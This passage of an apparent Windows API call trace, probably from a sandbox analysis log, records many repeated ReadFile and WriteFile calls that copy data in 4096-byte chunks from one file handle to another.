lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.181] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.181] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.181] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.181] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.181] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.182] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.182] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.182] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.182] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.182] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.182] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.182] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.182] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.183] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.183] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.183] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.183] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.183] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.183] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.183] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.183] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.184] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.184] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.184] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.184] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.184] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.184] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.184] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.184] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.185] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.185] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.185] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.185] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.185] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.185] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.185] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.185] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.186] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.186] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.186] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.186] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.187] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.187] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.187] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.187] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.187] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.187] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.187] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.187] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.188] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.188] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.188] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.188] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.188] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.188] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.188] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.188] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.188] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.189] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.189] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.189] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.189] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.189] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.189] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.189] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.189] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.189] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.190] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.190] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.190] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.190] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.190] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.190] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.190] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.190] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.191] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.191] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.191] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.191] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.192] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.192] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.192] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.192] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.192] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.192] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.192] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.192] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.193] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.193] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.193] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.193] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.193] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.193] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.193] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.193] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.194] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.194] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.194] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.194] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.194] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.194] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | 